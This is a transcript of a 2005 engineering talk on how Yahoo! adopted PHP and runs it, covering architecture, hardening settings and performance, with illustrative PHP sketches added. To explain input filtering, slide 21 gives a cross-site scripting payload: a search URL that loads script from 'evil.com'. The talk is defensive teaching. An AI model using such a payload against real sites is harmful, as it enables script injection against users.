
PHP at Yahoo! http://public.yahoo.com/~radwin/

Michael J. Radwin, October 20, 2005.


Presentation Transcript


  1. PHP at Yahoo! http://public.yahoo.com/~radwin/ Michael J. Radwin October 20, 2005

  2. Outline • Yahoo!, as seen by an engineer • Choosing PHP in 2002 • PHP architecture at Yahoo!

  3. The Internet’s most trafficked site

  4. 25 countries, 13 languages

  5. Yahoo! by the Numbers • 411M unique visitors per month • 191M active registered users • 11.4M fee-paying customers • 3.4B average daily pageviews (figures as of October 2005)

  6. Engineering Values • Security & Privacy • We must protect our customers’ information • High Availability • If the site is offline, we’re missing the opportunity to serve our customers • Performance • We serve billions of pageviews a day • Flexibility & Innovation • Customize site for each market • Rapid development of new features

  7. From Proprietary to Open Source [Timeline figure, 1994 to 2005. Rows and surviving labels: Web Server (“Filo Server”, Apache); DB (Flat Files); Web Lang (yScript)]

  8. How and Why We Selected PHP Choosing a Language

  9. Choosing PHP: brief history • October 2001: 3 proprietary languages • Costly to continue to maintain each • Limited features (no subroutines!) • Committee began researching • Compare features, performance • Build vs. Buy vs. Open Source • PHP selected May 2002

  10. Ideal Language Criteria • High performance • Robust, sand-boxed • Language features • Loops, conditionals • Complex data-types • C/C++ extensions • Runs on FreeBSD • Interpreted or dynamically compiled • i18n support • Clean separation of presentation/content/app semantics • Low training costs • Doesn’t require CS degree to use

  11. Top 10 Language Choices [Figure; surviving labels: mod_include, yScript, XSLT]

  12. Performance: Requests [Chart; surviving series labels: mod_perl, yScript]

  13. Performance: Memory [Chart; surviving series labels: mod_perl, yScript]

  14. Why we picked PHP • Designed for web scripting • High performance • Large, Open Source community • Documentation, easy to hire developers • “Code-in-HTML” paradigm: <html> <?php echo "Hello World"; ?> </html> • Integration, libraries, extensibility • Tools: IDE, debugger, profiler

  15. PHP at Yahoo! Today

  16. Yahoo!’s Development Methodology • Server Architecture • File Layout • Dependency Management • Security • Performance • Globalization

  17. Server Architecture [Diagram; surviving labels: Load Balancer, Web Server (three instances), Apache, Scripts, User Profile Server, Web Services, Ad Server]

  18. File Layout • HTML Templates: /usr/local/share/htdocs/*.php (95% HTML, 5% PHP) • Template Helpers: /usr/local/share/htdocs/*.inc (50% HTML, 50% PHP) • Business Logic: /usr/local/share/pear/*.inc (0% HTML, 100% PHP) • C/C++ Core Code: Data access, Networking, Crypto (0% HTML, 0% PHP)
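
The layering on this slide can be illustrated with a minimal sketch. Everything here is hypothetical (the function names, the sample data, and putting all three layers in one file for brevity); the talk does not show Yahoo!'s actual code. The point is only that business logic returns plain data, a helper turns data into a small HTML fragment, and the template is mostly markup.

```php
<?php
// All names below are hypothetical and for illustration only.

// Business logic layer (100% PHP): returns plain data, no markup.
function get_headlines(): array
{
    return [
        ['title' => 'PHP at Yahoo!', 'url' => '/news/1'],
        ['title' => 'Tips & Tricks', 'url' => '/news/2'],
    ];
}

// Template helper layer (a mix of PHP and HTML): renders one item,
// escaping the data so it is safe to embed in markup.
function render_headline(array $item): string
{
    $title = htmlspecialchars($item['title'], ENT_QUOTES, 'UTF-8');
    $url   = htmlspecialchars($item['url'], ENT_QUOTES, 'UTF-8');
    return "<li><a href=\"{$url}\">{$title}</a></li>";
}

// Template layer (mostly HTML): only loops and echoes.
// Output buffering captures the markup so it can be returned as a string.
function render_page(): string
{
    ob_start();
    ?>
<html>
<body>
<ul>
<?php foreach (get_headlines() as $item): ?>
<?= render_headline($item), "\n" ?>
<?php endforeach; ?>
</ul>
</body>
</html>
<?php
    return ob_get_clean();
}

echo render_page();
```

In a real deployment each layer would live in its own file under the directories listed on the slide, with the template pulling in helpers via include or require.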

  19. Dependency Management • Base PHP package depends only on XML parser • ./configure --disable-all • Self-Contained Extensions • mysql, dba, curl, ldap, pcre, gd, iconv • To enable • Install /usr/local/lib/php/20020429/mysql.so • Add “extension = mysql.so” to php.ini • Avoids unnecessary dependencies • Smaller Apache memory footprint
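
One way to see the effect of per-extension packaging is to ask a running PHP which extensions it actually has. The sketch below is an illustration rather than anything from the talk: the helper name extension_report() is made up, while extension_loaded() is a standard PHP function. Note that the old mysql extension named on the slide was removed in PHP 7, so it will report as missing on current builds.

```php
<?php
// Report which of the named extensions are loaded in this PHP build.
// extension_report() is a hypothetical helper name.
function extension_report(array $names): array
{
    $report = [];
    foreach ($names as $name) {
        $report[$name] = extension_loaded($name);
    }
    return $report;
}

// Extension names taken from the slide.
$wanted = ['mysql', 'dba', 'curl', 'ldap', 'pcre', 'gd', 'iconv'];

foreach (extension_report($wanted) as $name => $loaded) {
    printf("%-6s %s\n", $name, $loaded ? 'loaded' : 'missing');
}
```

A check like this can run at deploy time to catch a page that depends on an extension package nobody installed.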

  20. Security: INI Settings • open_basedir • Insurance against /etc/passwd exploits • allow_url_fopen = Off • Use libcurl extension instead • Avoid open proxy exploits • display_errors = Off • However, log_errors = On • safe_mode = Off • Intended for shared hosting environment
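
A small audit script can confirm that a server really runs with the settings on this slide. This is a sketch under assumptions: the helper names ini_flag_is_on() and audit_ini() are hypothetical, and safe_mode is left out because that directive no longer exists in current PHP releases. ini_get() is the standard way to read a directive at runtime.

```php
<?php
// Interpret a raw ini_get() result as a boolean flag.
// ini_get() returns false for an unknown key and a string otherwise.
function ini_flag_is_on($raw): bool
{
    if ($raw === false) {
        return false;
    }
    // display_errors may also hold "stdout" or "stderr", which both mean "on".
    $on = ['1', 'on', 'yes', 'true', 'stdout', 'stderr'];
    return in_array(strtolower(trim($raw)), $on, true);
}

// Return the directive names whose current value differs from the expected flag.
function audit_ini(array $expected): array
{
    $mismatches = [];
    foreach ($expected as $key => $want) {
        if (ini_flag_is_on(ini_get($key)) !== $want) {
            $mismatches[] = $key;
        }
    }
    return $mismatches;
}

// Expected values from the slide.
$expected = [
    'allow_url_fopen' => false,
    'display_errors'  => false,
    'log_errors'      => true,
];

foreach (audit_ini($expected) as $key) {
    echo "Mismatch: {$key}\n";
}

// open_basedir is a path list rather than a flag, so just report it.
$basedir = (string) ini_get('open_basedir');
echo 'open_basedir: ', $basedir === '' ? '(not set)' : $basedir, "\n";
```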

  21. Security: Input Filtering • Example: http://search.yahoo.com/search?p=<script+src=http://evil.com/x.js> • Cross Site Scripting (XSS) most common attack • Also “SQL Injection” • Normal approach • strip_tags() • mysqli_escape_string() • Examine every line of code • Tedious and error-prone • Use input_filter hook • Sanitize all user-submitted data • GET/POST/Cookie
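
The input_filter hook itself lives inside the PHP engine, so it cannot be shown in a script. As a rough userland approximation of the same idea (sanitize everything once, centrally, instead of at every use), the sketch below runs one function over GET, POST and Cookie data at the top of a request. The function name sanitize_input() is hypothetical, and combining strip_tags() with htmlspecialchars() is an assumption about what "sanitize" might mean here, not the filter Yahoo! used. It addresses XSS only; SQL injection still needs escaping or parameterized queries at the database layer.

```php
<?php
// Recursively strip tags and escape HTML metacharacters in user input.
// sanitize_input() is a hypothetical name; this is not the engine-level hook.
function sanitize_input($value)
{
    if (is_array($value)) {
        // Nested inputs such as ?a[]=1&a[]=2 arrive as arrays.
        return array_map('sanitize_input', $value);
    }
    return htmlspecialchars(strip_tags((string) $value), ENT_QUOTES, 'UTF-8');
}

// Sanitize every user-submitted source once, before any page code runs.
$_GET    = sanitize_input($_GET);
$_POST   = sanitize_input($_POST);
$_COOKIE = sanitize_input($_COOKIE);

// A query resembling the one on the slide, after filtering.
$query = sanitize_input('<script src=http://evil.com/x.js></script>php tips');
echo $query, "\n";
```

Filtering centrally means a page author cannot forget the step, which is the weakness of the line-by-line approach the slide calls tedious and error-prone.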

  22. Performance: Opcode Caches • Easiest performance boost • Cache parsed .php scripts in shared memory • Optimizations • No code modifications! • Several products available • Zend Performance Suite • APC • Turck MMCache

  23. Performance: PHP Extensions in C++ • PHP ships with 80 extensions written in C/C++ • Yahoo! develops its own proprietary extensions • Fast execution speed • Access to client libraries • Longer development cycle • Edit, compile, link, debug • Manual memory-management

  24. Globalization: PHP Unicode • Native Unicode support in 2006 • Collaborative effort • Andrei Zmievski (Yahoo!) • Andi Gutmans (Zend) • Many members of PHP Community [Figure: logos joined by “+ + =”; surviving labels: ICU, 6]
